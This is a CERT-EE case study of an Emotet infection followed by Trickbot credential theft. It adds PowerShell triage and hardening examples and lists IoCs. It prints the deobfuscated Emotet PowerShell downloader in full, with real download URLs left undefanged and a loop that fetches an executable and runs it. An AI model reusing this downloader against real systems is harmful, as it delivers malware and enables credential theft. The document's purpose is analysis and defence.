
Case study: the tale of one Emotet infection
By: CERT-EE / Estonian Information System Authority
Date: 23 October 2020
Tags: Emotet, malware, cybercrime, Trickbot

Summary

Emotet malware has been around since 2014. It is mostly spread through malicious e-mail attachments, often disguised as a forwarded e-mail or as a reply to a previous discussion. Because Emotet uses hijacked e-mail threads to spread, the discussion and the sender look familiar to the victim, who is therefore more likely to open the attachment. According to CERT-EE estimates, tens of thousands of infected files are sent daily to individuals and enterprises in Estonia, which currently makes Emotet the most prevalent malware family distributed in Estonia. As Emotet steals e-mails, there is also a risk of a data leak, which can result in a GDPR breach or contractual penalties. Emotet is also often used as a downloader for additional malware that steals credentials stored in browsers. Enterprises using cloud services should therefore be extra careful and require two-factor authentication. The purpose of this case study was to understand better how a current variant of Emotet works, so that we can recommend ways to mitigate the risk in advance and describe what to look out for in case of a suspected infection. An important finding is that while modern anti-virus software works against a large variety of malware, including Emotet, it is important to use its full functionality.

Case study timeline

For this case study we used Windows 10 version 2009 with the built-in Microsoft Defender antivirus and slightly modified settings. It should be noted that with Defender in its default configuration the infection did not succeed: Defender removed the malware. For the infection to succeed, Defender's "Cloud-delivered protection" had to be disabled.

Figure 1. Infected Emotet dropper .doc file where running the macro had to be enabled

After clicking "Enable Content", a heavily obfuscated macro ran and launched PowerShell with a base64-encoded, obfuscated command.

    Figure 2. PowerShell in base64 and obfuscated

After deobfuscating and decoding the base64, the following instructions were found in the PowerShell command.
--------
$P2t896q=Zgmfcmh; $Cpa3yo3=$*; $T9qq_nc=Gh2sw4h;
&new-item $eNv:useRprOFILe\QeZTn1z\P_WSvqA\ -itemtype dIrECtORY;
$Kcg966b=Rsthnuk;
[Net.ServicePointManager]::"secUriTypROtocoL" = tls12, tls11, tls;
$Ua2xau0=R1x2d9w; $O0umshk=Zz2_fj; $X8y3s56=S8s1vbu; $Wd0jfik=T7mjz5l;
$Zs8dvz7=$env:userprofile\Qeztn1z\P_wsvqa\$O0umshk+('.exe');
$Nj62m3r=Vj85wha;
$Ly7vast=new-object NEtWEbClIENT;
$Qqgc6sh=http://financiamentointeligente.com/wp-content/Fj/* http://www.removepctrojan.com/wp-admin/6/* http://aahnaturals.net/wp-includes/TX/* http://www.sff3d.com/3d/xk/* https://engineering-2s.com/SS_Paypal/X/* https://lsmanga.com/migration/FaU/* https://beta.zoneberry.com/bysyswexecf/x3/ .spLiT($Cpa3yo3);
$Ka78g_w=P_awrw3;
foreach ($Kk9rucd in $Qqgc6sh){try{$Ly7vast."DOwnloADFile"($Kk9rucd, $Zs8dvz7); $Pogmg4m=Quq7lrc;If ((.Get-Item $Zs8dvz7)."lEngTh" -ge 30706) {.Invoke-Item($Zs8dvz7); $E5z9o9t=Ffm269h; break;
--------
This PowerShell downloads and runs the Emotet payload. The command carries a list of seven download sites, joined by an asterisk and split into an array at run time, and tries them in order. A download only counts if the file saved to the newly created directory under the user profile is at least 30706 bytes long; this is how the loader skips error pages returned by sites that have already been cleaned up. Since the first download site had been taken down (step 1), the payload was delivered from the next site (step 2) and infected the computer. The payload then sent data from the infected machine to the C2 (step 3).
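To triage a sample like this without running it, an analyst usually needs only three things from the decoded command: the download list, the drop directory and the size check. The PowerShell below is an added example and is not code from the CERT-EE report. It decodes a base64 -EncodedCommand string (UTF-16LE, which is what powershell.exe expects) and extracts those fields with regular expressions, printing the URLs defanged in the same style as the IoC list at the end of the report. The encoded command it decodes is constructed here to mirror the structure of the listing above, with example.invalid hostnames in place of the real download sites; the decoded text is only searched, never executed.

```powershell
# Added example (not code from the CERT-EE report): decode an Emotet-style
# "-EncodedCommand" payload and pull out the fields an analyst needs for triage.
# Nothing in the decoded script is executed; it is only searched with regexes.

function Get-EmotetDownloaderIocs {
    param([Parameter(Mandatory)][string]$EncodedCommand)

    # powershell.exe -EncodedCommand takes base64 over UTF-16LE text, not UTF-8
    $script = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($EncodedCommand))

    # The download list is one string, sites joined by a separator ('*' in this sample)
    # and .Split() at run time; a URL ends at the separator, a quote, a space or a ';'
    $urls = @([regex]::Matches($script, 'https?://[^\s''"*;)]+') | ForEach-Object { $_.Value })

    # "-ge <n>" is the minimum size in bytes the saved file must have before it is run
    $minSize = $null
    if ($script -match '-ge\s+(\d+)') { $minSize = [int]$Matches[1] }

    # The directory created under the user profile is where the payload is dropped
    $dropDir = $null
    if ($script -match '\$env:userprofile\\([^\s''";]+)') { $dropDir = $Matches[1] }

    [pscustomobject]@{
        DropDirectory   = $dropDir
        MinPayloadBytes = $minSize
        Urls            = $urls
        # Same defanging convention as the IoC list at the end of the report
        DefangedUrls    = @($urls | ForEach-Object { ($_ -replace '^(https?):', '$1[:]') -replace '\.', '[.]' })
    }
}

# CONSTRUCTED sample mirroring the structure of the deobfuscated command above,
# with example.invalid hosts in place of the real download sites.
$sampleScript = @'
$Cpa3yo3='*';&new-item $eNv:useRprOFILe\QeZTn1z\P_WSvqA\ -itemtype dIrECtORY;$Zs8dvz7=$env:userprofile\Qeztn1z\P_wsvqa\Zz2_fj.exe;$Ly7vast=new-object NEtWEbClIENT;$Qqgc6sh='http://a.example.invalid/wp-content/Fj/*https://b.example.invalid/migration/FaU/'.spLiT($Cpa3yo3);foreach ($Kk9rucd in $Qqgc6sh){try{$Ly7vast."DOwnloADFile"($Kk9rucd, $Zs8dvz7);If ((.Get-Item $Zs8dvz7)."lEngTh" -ge 30706) {.Invoke-Item($Zs8dvz7);break}}catch{}}
'@
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($sampleScript))

Get-EmotetDownloaderIocs -EncodedCommand $encoded | Format-List
```

For a real sample, take the base64 string from the `-EncodedCommand` (or `-e`) argument of the powershell.exe command line the macro spawned (Sysmon event 1 or the Word process tree in your EDR) and pass it to the function instead of `$encoded`. Real Emotet commands add a layer of string obfuscation on top of the encoding, as Figure 2 shows, so the regexes may need to run on the output of that deobfuscation rather than on the raw decoded text.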

    Figure 3. Downloading malware payload and uploading data from victim to C2.

In less than 30 minutes the infected device is turned into an Emotet spam drone that, on instructions from the C2, starts sending new malicious dropper .doc files to new victims.

    Figure 4. Sending out Emotet droppers to new victims.


About 15 minutes after the infection the device is also infected with Trickbot malware. Figure 5 shows a typical Trickbot infection: checking the external IP address (step 1), downloading the Trickbot payload (step 2), sending out Edge form data from the browser (step 3), and stealing and sending out the Gmail password stored in the mail client of the infected machine (step 4).

    Figure 5. Emotet infected device being infected with Trickbot malware

    Figure 6. Trickbot stealing user credentials from mail client for Google account

Trickbot injects itself into the Windows Problem Reporting manager process, wermgr.exe, and uses it to communicate with its C2.

    Figure 7. Trickbot communication via wermgr.exe

To establish persistence, Emotet writes itself to the "HKEY_CURRENT_USER" registry hive under "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run". Trickbot uses the Task Scheduler, creating a task that runs at user logon.


Figure 8. Trickbot persistence
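A first-response check for the three host artefacts described above (the HKCU Run value, the logon-triggered scheduled task, and wermgr.exe carrying C2 traffic), as an added example that is not from the CERT-EE report. It lists Run values and logon-triggered tasks, flags any whose command points into a location the user can write to, and lists established TCP connections owned by wermgr.exe, matching the remote address against a handful of the C2 addresses from the report's IoC list. Assumptions: it runs in an interactive PowerShell on the suspect host as the affected user (HKCU is that user's hive), and both the writable-location list and the C2 list are starting points to be extended from your own baseline and threat intelligence.

```powershell
# Added example, not CERT-EE's code: live triage for the persistence and injection
# seen in this case. Run as the affected user on the suspect host (HKCU is per user).

$RunKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'

# Locations a standard user can write to. Extend to match your own AppLocker baseline.
$UserWritable = @($env:USERPROFILE, $env:APPDATA, $env:LOCALAPPDATA, 'C:\Users\Public') |
    Where-Object { $_ }

# A few of the C2 addresses from the report's IoC list (assumption: still in use)
$KnownC2 = @('80.85.156.116', '199.38.121.150', '208.86.162.215', '103.206.128.121', '45.89.127.244')

function Test-UserWritablePath {
    param([string]$Command)
    # Expand %VARS% the way Task Scheduler or the shell would, then look for a writable root
    $expanded = [Environment]::ExpandEnvironmentVariables($Command)
    foreach ($root in $UserWritable) {
        if ($expanded.IndexOf($root, [StringComparison]::OrdinalIgnoreCase) -ge 0) { return $true }
    }
    return $false
}

$findings = @()

# 1. HKCU\...\Run: Emotet's persistence in the case study
if (Test-Path $RunKey) {
    foreach ($p in (Get-ItemProperty -Path $RunKey).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath/... provider noise
        $findings += [pscustomobject]@{
            Source     = 'HKCU Run'
            Name       = $p.Name
            Command    = [string]$p.Value
            Suspicious = Test-UserWritablePath ([string]$p.Value)
        }
    }
}

# 2. Scheduled tasks with a logon trigger: Trickbot's persistence in the case study
foreach ($task in Get-ScheduledTask) {
    $logon = $task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }
    if (-not $logon) { continue }
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }
        $cmd = ("$($action.Execute) $($action.Arguments)").Trim()
        $findings += [pscustomobject]@{
            Source     = "Task $($task.TaskPath)$($task.TaskName)"
            Name       = $task.TaskName
            Command    = $cmd
            Suspicious = Test-UserWritablePath $cmd
        }
    }
}

# 3. wermgr.exe with live TCP connections: Trickbot's injection target for C2 traffic.
# wermgr.exe legitimately talks to Microsoft's error-reporting endpoints, so the
# remote address matters more than the mere existence of a connection.
$wermgrPids = @(Get-Process -Name wermgr -ErrorAction SilentlyContinue | ForEach-Object { $_.Id })
if ($wermgrPids.Count -gt 0) {
    foreach ($conn in Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue) {
        if ($conn.OwningProcess -notin $wermgrPids) { continue }
        $findings += [pscustomobject]@{
            Source     = "wermgr.exe pid $($conn.OwningProcess)"
            Name       = 'TCP'
            Command    = "$($conn.RemoteAddress):$($conn.RemotePort)"
            Suspicious = ($conn.RemoteAddress -in $KnownC2)
        }
    }
}

if (-not $findings) { 'No Run values, logon-triggered tasks or wermgr.exe connections found.' }
$findings | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

A Run value or logon task that launches something from the profile directory is not proof of infection on its own (some legitimate per-user installers do the same), but in this case it was exactly where both families lived, so every flagged entry deserves a look at the file it points to. Running the check as a different user, or against an offline disk, means loading that user's NTUSER.DAT under another key and adjusting `$RunKey` accordingly.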

Four days later, Google notified the user that the account had been suspended due to a suspicious login.

    Figure 9. Notification (in Estonian) that the account has been suspended

After account recovery, it is evident from the logs that Google disabled the account after a suspicious login attempt from Vietnam using the stolen credentials.

    Figure 10. Login attempt from Vietnam that triggered account suspension

Figure 11. Login attempt from Vietnam that triggered account suspension

Emotet's behaviour shows that, on top of using the infected device to send out new malware, it also uses the stolen e-mail account itself to spread malicious files.

    Figure 12. Google account was used for sending malware

Conclusion

Emotet remains a villain that needs to be taken seriously, both on its own and as a source of new malware, which in our case was Trickbot. This shows that both malware families remain up and running despite efforts to bring an end to them. Based on this case study, CERT-EE recommends that enterprises:

• use antivirus software to its fullest functionality. Disabling features that antivirus vendors have developed to protect their customers (e.g. leveraging cloud-based information) puts users and their enterprises at risk;

• set up a policy for mandatory and regular "full scans", with central management and alerting for antivirus products;

• block or quarantine at the perimeter e-mails carrying documents that contain macros or password-protected archives, so that such attachments never reach users' mailboxes;

• for visibility and detection, make sure that moving devices outside the perimeter does not reduce visibility of them. Visibility should be maintained through technical means such as "always-on" forced VPN tunnels. The use of split tunnelling should be weighed against the risk of suspicious traffic bypassing firewall/IDS/IPS investments;

• since both Emotet and Trickbot used the user's profile directory for their actions and persistence, consider enforcing AppLocker (Windows 10/Windows Server) policies. They should be designed so that executable programs and scripts may run only from whitelisted directories, excluding the user's profile directory and any other directory the user can write to;

• not give users an administrator role on their everyday account. For administrative purposes there should be a separate account with limitations in other respects, e.g. no mailbox and limited access to network resources;

• e-mail service providers should apply similar checks to e-mails containing malicious URLs or malware and refuse delivery, for both inbound and outbound traffic.
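One way to apply the Defender and AppLocker recommendations on a single Windows 10 host, added here as an example and not taken from the report. Assumptions: it runs from an elevated PowerShell, Defender is the antivirus in use, the Windows edition has AppLocker (Enterprise, Education or Server), and the AppLocker policy is deployed in audit mode first. The attack surface reduction rule goes one step beyond the report's recommendation: it blocks the Word-to-PowerShell step of Figure 2 directly rather than relying on detection of what PowerShell downloads.

```powershell
# Added example, not CERT-EE's code: apply the host-level recommendations from the
# conclusion to one Windows 10 machine. Run from an elevated PowerShell.
# Assumptions: Defender is the AV in use; the edition supports AppLocker; the
# AppLocker policy is deployed in AuditOnly first and switched to Enabled after review.

#Requires -RunAsAdministrator

# --- 1. Defender: the setting the case study had to disable is cloud-delivered
# protection (MAPSReporting). Turn it back on together with real-time and behaviour monitoring.
Get-MpPreference | Select-Object MAPSReporting, SubmitSamplesConsent, DisableRealtimeMonitoring |
    Format-List   # MAPSReporting 0 = off, 1 = basic, 2 = advanced

Set-MpPreference -MAPSReporting Advanced `
                 -SubmitSamplesConsent SendSafeSamples `
                 -DisableRealtimeMonitoring $false `
                 -DisableBehaviorMonitoring $false

# Beyond the report: an attack surface reduction rule that stops Office applications
# from starting child processes, i.e. the Word macro -> PowerShell step of Figure 2.
# The GUID is Microsoft's published id for "Block all Office applications from creating child processes".
Add-MpPreference -AttackSurfaceReductionRules_Ids 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' `
                 -AttackSurfaceReductionRules_Actions Enabled

$status = Get-MpComputerStatus
if (-not $status.RealTimeProtectionEnabled) { Write-Warning 'Real-time protection is still off' }
if ((Get-MpPreference).MAPSReporting -ne 2)  { Write-Warning 'Cloud-delivered protection is still off' }

# --- 2. AppLocker: executables and scripts may run only from Program Files and the
# Windows folder (plus anything for local administrators), so the user profile, where
# both Emotet and Trickbot lived, is denied by default. Two explicit Deny rules carve
# user-writable folders under %WINDIR% out of the Windows allow rule. Rule ids are
# fresh GUIDs; names are free text.
$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="AuditOnly">
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow Windows" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny Windows Temp" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\Temp\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny Windows Tasks" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\Tasks\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow administrators everything" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Script" EnforcementMode="AuditOnly">
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow Program Files scripts" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow Windows scripts" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Allow administrators all scripts" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@

$policyPath = Join-Path $env:TEMP 'applocker-audit.xml'
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8
Set-AppLockerPolicy -XmlPolicy $policyPath -Merge      # -Merge keeps rules that already exist
sc.exe config appidsvc start= auto | Out-Null          # enforcement needs the Application Identity service
Start-Service -Name AppIDSvc
Get-AppLockerPolicy -Effective -Xml                    # confirm what is now in effect
```

Leave the collections in AuditOnly until the AppLocker event log (Applications and Services Logs, Microsoft, Windows, AppLocker) has run clean for your line-of-business software, then change EnforcementMode to Enabled. The two Deny rules cover only the best-known user-writable folders under the Windows directory; audit the rest with a tool such as Sysinternals accesschk and add rules for whatever a standard user can write to. A side effect worth knowing: once Script rules are enforced, PowerShell runs in ConstrainedLanguage mode for non-administrators, which by itself would have stopped the `new-object NEtWEbClIENT` step of the downloader. If Defender's tamper protection is enabled, the Set-MpPreference changes may be ignored and must be made through the Windows Security app or your management tooling instead.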

Disclaimer

Microsoft Defender was not defeated by Emotet or Trickbot in any way in this case study. In fact, we had to disable "Cloud-delivered protection" to let the malware perform at its most effective in order to learn its behaviour. We did not disable Defender updates, and after every update Defender turned its "real-time protection" back to its default setting: ON. This did not require any user interaction.

CERT-EE is a department of the Estonian Information System Authority that deals with cyber security incidents occurring in Estonian networks and is, under the NIS Directive and the Cybersecurity Act, the single point of contact for Estonia.

IoCs

URL:
http[:]//financiamentointeligente[.]com/wp-content/Fj/
http[:]//www.removepctrojan[.]com/wp-admin/6/
http[:]//aahnaturals[.]net/wp-includes/TX/
http[:]//www.sff3d[.]com/3d/xk/
http[:]//engineering-2s[.]com/SS_Paypal/X/
http[:]//lsmanga[.]com/migration/FaU/
http[:]//beta.zoneberry[.]com/bysyswexecf/x3/

JA3: 72a589da586844d7f0818ce684948eea

IP:
80.85.156.116
199.38.121.150
199.38.123.58
208.86.162.215
199.38.120.91
208.86.161.113
208.86.162.241
103.206.128.121
199.38.120.89
103.109.78.174
103.127.165.250
45.89.127.244
104.161.32.125
164.68.107.55
194.5.249.241
181.166.205.18
115.75.42.47
202.79.35.15
124.105.35.15
124.105.107.57
111.246.43.36